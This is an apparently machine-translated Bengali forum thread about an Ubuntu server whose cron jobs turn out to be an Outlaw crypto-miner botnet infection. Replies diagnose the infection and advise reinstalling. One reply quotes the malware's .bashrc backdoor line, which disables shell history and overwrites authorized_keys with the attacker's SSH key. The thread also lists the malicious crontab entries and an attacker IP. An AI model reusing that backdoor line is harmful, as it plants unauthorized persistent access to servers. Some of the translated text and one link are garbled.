অদ্ভুত ক্রোন জব সিপিইউ উবুন্টু 18 এলটিএস সার্ভারের 100% নেয়

আমি ওয়েয়ার ক্রোন জবগুলি দেখিয়ে চলেছি এবং তারা কী করে তা আমার কোনও ধারণা নেই। আমি তাদের থামাতে সাধারণত কিল -9 জারি করি। তারা আমার সিপিইউর 100% নেয় এবং আমি পরীক্ষা না করা অবধি কয়েক দিন চলতে পারে। এর অর্থ কী কেউ জানে?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

গতকাল 7/24/2019 পর্যন্ত আমি উবুন্টু 18 এলটিএস সার্ভারটি পুরোপুরি আপ টু ডেট চালাচ্ছি

হালনাগাদ

আমি সমস্ত প্রতিক্রিয়া প্রশংসা করি। আমি সমস্ত ডেটা এবং অ্যাপ্লিকেশন ড্রাইভ সংযোগ বিচ্ছিন্ন করেছি যেহেতু কেবলমাত্র ওএস ড্রাইভই আক্রান্ত হয়েছিল, আমি কমপক্ষে এই ধরণের জিনিসটি যথাযথভাবে করেছি। আমি আরও অনেক সুরক্ষা এবং আরও সুরক্ষিত পদ্ধতি সহ একটি সম্পূর্ণ পুনর্নির্মাণের সাথে যাচ্ছি।

আপনার মেশিনে সম্ভবত ক্রিপ্টো মাইনার সংক্রমণ রয়েছে। সিকিউরিটি সেন্টারের সাথে আজুরের ভার্চুয়াল মেশিনের রিয়েল-লাইফ সনাক্তকরণে আপনি অন্য কারও অনুরূপ ফাইলের নাম এবং আচরণের প্রতিবেদন দেখতে পাচ্ছেন । আরও দেখুন আমার উবুন্টু সার্ভার একটি ভাইরাস আছে ... আমি এটা অবস্থিত করেছি কিন্তু আমি তা পরিত্রাণ পেতে না ... Reddit এ।

আপনি আর সেই মেশিনকে বিশ্বাস করতে পারবেন না এবং এটি আবার ইনস্টল করা উচিত। ব্যাকআপগুলি পুনরুদ্ধার করতে সাবধান হন।

আপনার মেশিনটি ক্রিপ্টো মাইনারের আক্রমণে আক্রান্ত হয়েছে। আমি অতীতেও একই ধরণের রেনসওয়্যার হামলার মুখোমুখি হয়েছিলাম এবং আমার ডেটাবেস আপোস করা হয়েছিল। আমি মেশিনটির জন্য একটি এসকিউএল ডাম্প নিয়েছিলাম এবং মেশিনটি পুনঃনির্ধারণ করেছি (কারণ আমার মেশিনটি এডাব্লুএস ইসি 2 তে হোস্ট করা ভিএম ছিল)। আমি এসএসএইচ অ্যাক্সেস এবং সংশোধিত পাসওয়ার্ডগুলি লকড করার জন্য মেশিনের সুরক্ষা গোষ্ঠীগুলিও সংশোধন করেছি। আমি লগ ক্যোয়ারীগুলিতে লগিং সক্ষম করেছিলাম এবং এটি প্রতি রাতে এস 3 এ রফতানি করি।

আমার ক্ষেত্রেও একই ঘটনা ঘটেছিল এবং আমি গতকাল লক্ষ্য করেছি। আমি ফাইলটি যাচাই করেছিলাম /var/log/syslogএবং এই আইপি (185.234.218.40) স্বয়ংক্রিয়ভাবে ক্রোনজব চালাচ্ছে বলে মনে হয়েছে।

আমি HTTP এ এটি পরীক্ষা করে দেখি ( https://phaismyipaddress.com/ip/185.234.218.40 ) এবং এর কিছু প্রতিবেদন রয়েছে। এই ফাইলগুলি ট্রোজান সম্পাদনা করেছিল:

• .bashrc
• .ssh / authorized_keys -র

আমি এটি শেষে পেয়েছি .bashrc(যা প্রতিটি বার ব্যাশ খোলার পরে কার্যকর করা হয়):

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

এটি আপনার authorized_keysফাইলটি মোছা হচ্ছে , এটি এসএসএইচ কীগুলির একটি তালিকা যা কোনও পাসওয়ার্ড ছাড়াই সংযোগ করার অনুমতিপ্রাপ্ত। তারপরে, এটি আক্রমণকারীটির এসএসএইচ কী যুক্ত করে:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

তদতিরিক্ত, আমি এই ফোল্ডারটি পেয়েছি: /tmp/.X13-unix/.rsyncযেখানে সমস্ত ম্যালওয়্যার। এমনকি আমি একটি ফাইল, /tmp/.X13-unix/.rsync/c/ip70,000 আইপি অ্যাড্রেস সম্বলিত একটি ফাইল পেয়েছি যা সম্ভবত অন্যান্য ক্ষতিগ্রস্থ বা নোড সার্ভার রয়েছে।

2 টি সমাধান রয়েছে: এ:

• এক্সপোর্ট ব্যর্থ পাসওয়ার্ডের পরে আইপি ঠিকানাকে নিষিদ্ধ করে এমন একটি প্রোগ্রাম যা পোর্ট 22 এবং আপনার প্রয়োজনীয় খুঁজে পাওয়া যায় এবং ব্যর্থ 2ban সক্ষম করে ব্যতীত সমস্ত বহির্গামী সংযোগগুলি অবরুদ্ধ করে ফায়ারওয়াল যুক্ত করুন X

• সমস্ত ক্রোন জব ps aux | grep cronহত্যা করুন:, তারপরে যে পিআইডি প্রদর্শিত হবে তাকে হত্যা করুন

• আপনার পাসওয়ার্ডটি একটি সুরক্ষিত পাসওয়ার্ডে পরিবর্তন করুন

খ:

• আপনার প্রয়োজন বা চান যে কোনও ফাইল বা ফোল্ডার ব্যাক আপ করুন

• সার্ভারটি পুনরায় সেট করুন এবং উবুন্টু পুনরায় ইনস্টল করুন বা সরাসরি একটি নতুন ফোঁট তৈরি করুন

  থম উইগার্স যেমন বলেছেন, আপনি অবশ্যই একটি বিটকয়েন মাইনিং বোটনেটের অংশ, এবং আপনার সার্ভারটির একটি ব্যাকডোর রয়েছে । পিছনের অংশে একটি পার্ল শোষণ নিয়োগ করে, একটি ফাইল এখানে অবস্থিত: এতে /tmp/.X13-unix/.rsync/b/run( https://pastebin.com/ceP2jsUy ) রয়েছে

আমি খুঁজে পাওয়া সন্দেহজনক ফোল্ডারগুলি হ'ল:

• /tmp/.X13-unix/.rsync

• ~/.bashrc (যা সম্পাদিত হয়েছিল)

• ~/.firefoxcatche

পরিশেষে, এখানে পার্ল ব্যাকডোর সম্পর্কিত একটি নিবন্ধ রয়েছে: https://blog.trendmicro.com/trendlabs-security-inte होतेnce/outlaw-hacking-groups-botnet-observ-spreading-miner-perl-based-backdoor/

আশা করি এটি আপনার কাজে লাগবে।